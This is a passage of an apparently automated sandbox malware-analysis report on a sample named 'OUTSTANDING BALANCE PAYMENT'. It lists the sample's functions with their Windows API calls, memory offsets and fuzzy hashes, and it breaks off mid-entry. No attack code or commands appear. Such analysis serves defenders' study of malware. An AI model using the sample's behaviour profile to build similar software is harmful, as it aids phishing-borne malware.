                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: 4a0c91083a2cf35b824cb320db91f16bed146ad0eb5abb50ee1b66f4430a3f18
                                                                  • Instruction ID: f1eabf9a93685e1c4d2bf9029ba7f05090a8e288bb59df7f9c1b153853b31f22
                                                                  • Opcode Fuzzy Hash: 4a0c91083a2cf35b824cb320db91f16bed146ad0eb5abb50ee1b66f4430a3f18
                                                                  • Instruction Fuzzy Hash: E421A478911108AFDB06AFA4CC95EFEB7B9EF45340F500116F551932D1DBB55825DF20
                                                                  Function 002BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002BBA73
                                                                  • GetDlgCtrlID.USER32 ref: 002BBA7E
                                                                  • GetParent.USER32 ref: 002BBA9A
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 002BBA9D
                                                                  • GetDlgCtrlID.USER32(?), ref: 002BBAA6
                                                                  • GetParent.USER32(?), ref: 002BBAC2
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 002BBAC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: a2db48c78b5d99b45355a3aa15a87c2110491ddbfdc1ea685e02804be016457c
                                                                  • Instruction ID: 680791b7b74b405a04c730ba9d10db3ec3eb34e83629bfc1365fc48422ac29f1
                                                                  • Opcode Fuzzy Hash: a2db48c78b5d99b45355a3aa15a87c2110491ddbfdc1ea685e02804be016457c
                                                                  • Instruction Fuzzy Hash: EF21F2B4A11108BFDB02AFA4CC95EFEBBB8EF44300F500016F551A32D1DBB548299F20
                                                                  Function 002BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32 ref: 002BBAE3
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 002BBAF8
                                                                  • _wcscmp.LIBCMT ref: 002BBB0A
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002BBB85
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: fb7d78df4d7212754536d46440714472d040b97550c24c4e6e16da3cbed8bb79
                                                                  • Instruction ID: 90f168cddedeeda29d5760a4406372979a7c5dd80532801907aac16256978db8
                                                                  • Opcode Fuzzy Hash: fb7d78df4d7212754536d46440714472d040b97550c24c4e6e16da3cbed8bb79
                                                                  • Instruction Fuzzy Hash: AB110676628307FFFA226A35DC56DE7379C9B117A8F200022FD04E54E5EFE2A8314914
                                                                  Function 002DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002DB2D5
                                                                  • CoInitialize.OLE32(00000000), ref: 002DB302
                                                                  • CoUninitialize.OLE32 ref: 002DB30C
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 002DB40C
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 002DB539
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 002DB56D
                                                                  • CoGetObject.OLE32(?,00000000,0030D91C,?), ref: 002DB590
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 002DB5A3
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002DB623
                                                                  • VariantClear.OLEAUT32(0030D91C), ref: 002DB633
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 60a571d09412ec2ec8d38a14a01f074fb0409a1b3bef8d64806777d2f15f82b1
                                                                  • Instruction ID: b26c0b458ef7eae2be80bb863ec7f86da6811de8e984832f3a820641788bee31
                                                                  • Opcode Fuzzy Hash: 60a571d09412ec2ec8d38a14a01f074fb0409a1b3bef8d64806777d2f15f82b1
                                                                  • Instruction Fuzzy Hash: 79C13375618301EFC701EF68C8A496AB7E9BF88308F00495EF58A9B351DB70ED15CB92
                                                                  Function 002AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 002AACC1
                                                                    • Part of subcall function 002A7CF4: __mtinitlocknum.LIBCMT ref: 002A7D06
                                                                    • Part of subcall function 002A7CF4: EnterCriticalSection.KERNEL32(00000000,?,002A7ADD,0000000D), ref: 002A7D1F
                                                                  • __calloc_crt.LIBCMT ref: 002AACD2
                                                                    • Part of subcall function 002A6986: __calloc_impl.LIBCMT ref: 002A6995
                                                                    • Part of subcall function 002A6986: Sleep.KERNEL32(00000000,000003BC,0029F507,?,0000000E), ref: 002A69AC
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 002AACED
                                                                  • GetStartupInfoW.KERNEL32(?,00336E28,00000064,002A5E91,00336C70,00000014), ref: 002AAD46
                                                                  • __calloc_crt.LIBCMT ref: 002AAD91
                                                                  • GetFileType.KERNEL32(00000001), ref: 002AADD8
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 002AAE11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1426640281-0
                                                                  • Opcode ID: ca49a4db84f991d9a9ab5f0cfaf3866f7b0738fdd100482320b35b12fad91649
                                                                  • Instruction ID: de0a186c63e7e27b1916ba296e1839de259ba328fd4e966c370742416a0962dc
                                                                  • Opcode Fuzzy Hash: ca49a4db84f991d9a9ab5f0cfaf3866f7b0738fdd100482320b35b12fad91649
                                                                  • Instruction Fuzzy Hash: 8981D2709257468FDB15CF68C9805ADBBF4AF0B320F24426EE4A6EB3D1DB359812CB51
                                                                  Function 002FDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0029B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0029B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0029B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0029B4BD
                                                                  • GetClientRect.USER32(?), ref: 002FDD63
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 002FDD7A
                                                                  • GetWindowDC.USER32(?), ref: 002FDD86
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 002FDD95
                                                                  • ReleaseDC.USER32(?,00000000), ref: 002FDDA7
                                                                  • GetSysColor.USER32(00000005), ref: 002FDDC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3430376129-0
                                                                  • Opcode ID: 43279b987ecc541b13d6c990c506f79a6815e9bf32906b6b3afea206dd115fca
                                                                  • Instruction ID: 5ee73fcbe4f83bbed9f69e7b950809a03f8fa6c4fb60b6affd519d805c10074f
                                                                  • Opcode Fuzzy Hash: 43279b987ecc541b13d6c990c506f79a6815e9bf32906b6b3afea206dd115fca
                                                                  • Instruction Fuzzy Hash: DC118131111205EFDB626FB4EC18BA97FA9EB05325F104622FA66950E1CB710951EF10
                                                                  Function 00283093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002830DC
                                                                  • CoUninitialize.OLE32(?,00000000), ref: 00283181
                                                                  • UnregisterHotKey.USER32(?), ref: 002832A9
                                                                  • DestroyWindow.USER32(?), ref: 002F5079
                                                                  • FreeLibrary.KERNEL32(?), ref: 002F50F8
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002F5125
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: deb903fb434c57812cc4c28e36965494dabb37b3c36872dced5a8df066f528e9
                                                                  • Instruction ID: ee972747a0bf8b73c462299cef227bb505b1a9411d98ff4062662f27e27fe87c
                                                                  • Opcode Fuzzy Hash: deb903fb434c57812cc4c28e36965494dabb37b3c36872dced5a8df066f528e9
                                                                  • Instruction Fuzzy Hash: 9D912B382225168FC715FF24C895B69F3A4BF04B04F5541A9E50AA72A2DF30AE76CF50
                                                                  Function 0029CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0029CC15
                                                                    • Part of subcall function 0029CCCD: GetClientRect.USER32(?,?), ref: 0029CCF6
                                                                    • Part of subcall function 0029CCCD: GetWindowRect.USER32(?,?), ref: 0029CD37
                                                                    • Part of subcall function 0029CCCD: ScreenToClient.USER32(?,?), ref: 0029CD5F
                                                                  • GetDC.USER32 ref: 002FD137
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002FD14A
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 002FD158
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 002FD16D
                                                                  • ReleaseDC.USER32(?,00000000), ref: 002FD175
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002FD200
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 560e2284d79b0bdad43f17d62042ecbac91be23ee62b0611d2b45f9ed6715546
                                                                  • Instruction ID: 1f2f0add71170efecef34e3b2d111b6b0c58448aa57635d8b2bf3457106972c3
                                                                  • Opcode Fuzzy Hash: 560e2284d79b0bdad43f17d62042ecbac91be23ee62b0611d2b45f9ed6715546
                                                                  • Instruction Fuzzy Hash: 0E71E83042020ADFCF21DF64CC91ABABBB6FF45394F24427AEE595A166C7319861DF50
                                                                  Function 002EECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                    • Part of subcall function 0029B63C: GetCursorPos.USER32(000000FF), ref: 0029B64F
                                                                    • Part of subcall function 0029B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0029B66C
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000001), ref: 0029B691
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000002), ref: 0029B69F
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 002EED3C
                                                                  • ImageList_EndDrag.COMCTL32 ref: 002EED42
                                                                  • ReleaseCapture.USER32 ref: 002EED48
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 002EEDF0
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002EEE03
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 002EEEDC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 1924731296-2107944366
                                                                  • Opcode ID: 128b68cd046961018127a1450d0441ce51a060976b2fee6c4ee07d2e1cf8c846
                                                                  • Instruction ID: b569f16d22b1e4d9b0cc5147de55138d1c048ecc5eeadfa8e402d5b70a557345
                                                                  • Opcode Fuzzy Hash: 128b68cd046961018127a1450d0441ce51a060976b2fee6c4ee07d2e1cf8c846
                                                                  • Instruction Fuzzy Hash: 3951CA34254300AFD701EF20DC96FAA77E8AB88314F44491EF989972E1DB74E968CF52
                                                                  Function 002D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002D45FF
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002D462B
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002D466D
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002D4682
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D468F
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002D46BF
                                                                  • InternetCloseHandle.WININET(00000000), ref: 002D4706
                                                                    • Part of subcall function 002D5052: GetLastError.KERNEL32(?,?,002D43CC,00000000,00000000,00000001), ref: 002D5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 1241431887-3916222277
                                                                  • Opcode ID: c31643f1a94f2e6fa520d7d7fcc7744cb8b4ec2d1d4b90cfd4c8b25f08aac8dd
                                                                  • Instruction ID: e5bdc8d81cffa356053180e89e44869df4a83d5df6e9dca9dd60a1eb4b30a353
                                                                  • Opcode Fuzzy Hash: c31643f1a94f2e6fa520d7d7fcc7744cb8b4ec2d1d4b90cfd4c8b25f08aac8dd
                                                                  • Instruction Fuzzy Hash: C3415CB1511215BFEB12AF90CC89FBB77ACEF09754F104127FA069A281D7B0DD548BA4
                                                                  Function 002DB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0031DC00), ref: 002DB715
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0031DC00), ref: 002DB749
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002DB8C1
                                                                  • SysFreeString.OLEAUT32(?), ref: 002DB8EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: b22c065e73265d12cbaec5e7e92207daf12ffc435d149d7e08273cbf2f7149c0
                                                                  • Instruction ID: efc89b6474580c968a7f2db65787a90cb8652938a9bef85e9fe2426dbed249ec
                                                                  • Opcode Fuzzy Hash: b22c065e73265d12cbaec5e7e92207daf12ffc435d149d7e08273cbf2f7149c0
                                                                  • Instruction Fuzzy Hash: 65F14975A10209EFCF05DF94C898EAEB7B9FF49311F11809AF905AB250DB71AE51CB90
                                                                  Function 002E24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002E24F5
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002E2688
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002E26AC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002E26EC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002E270E
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002E286F
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002E28A1
                                                                  • CloseHandle.KERNEL32(?), ref: 002E28D0
                                                                  • CloseHandle.KERNEL32(?), ref: 002E2947
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: 34c6d4c6c7b2f65a47439b2e2ca1b3ab9f952c2a04e98e2461095d43d1c74a7d
                                                                  • Instruction ID: 53334731f5bddad92c24d92f876ef1010e35fbb0b404f10e99b2f2cff09faeac
                                                                  • Opcode Fuzzy Hash: 34c6d4c6c7b2f65a47439b2e2ca1b3ab9f952c2a04e98e2461095d43d1c74a7d
                                                                  • Instruction Fuzzy Hash: 44D1EF35224341DFCB15EF25C891A6ABBE9BF84310F54855DF88A9B2A2DB30DC58CF52
                                                                  Function 002EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002EB3F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: eaada85e4e9f9338ec5ce460242a309ad0b8451300679e60cc271e1af08afb6a
                                                                  • Instruction ID: 25a71742fb4d13e10043ba19a254ab5a85372c1f957683ec771769371583da78
                                                                  • Opcode Fuzzy Hash: eaada85e4e9f9338ec5ce460242a309ad0b8451300679e60cc271e1af08afb6a
                                                                  • Instruction Fuzzy Hash: 7351E6305A1285BFEF239F66CC96BAF3B68AB05314FE44052F614D61E1C7B1E9708B50
                                                                  Function 0029A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002FDB1B
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002FDB3C
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002FDB51
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002FDB6E
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002FDB95
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0029A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002FDBA0
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002FDBBD
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0029A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002FDBC8
                                                                  Memory Dump Source
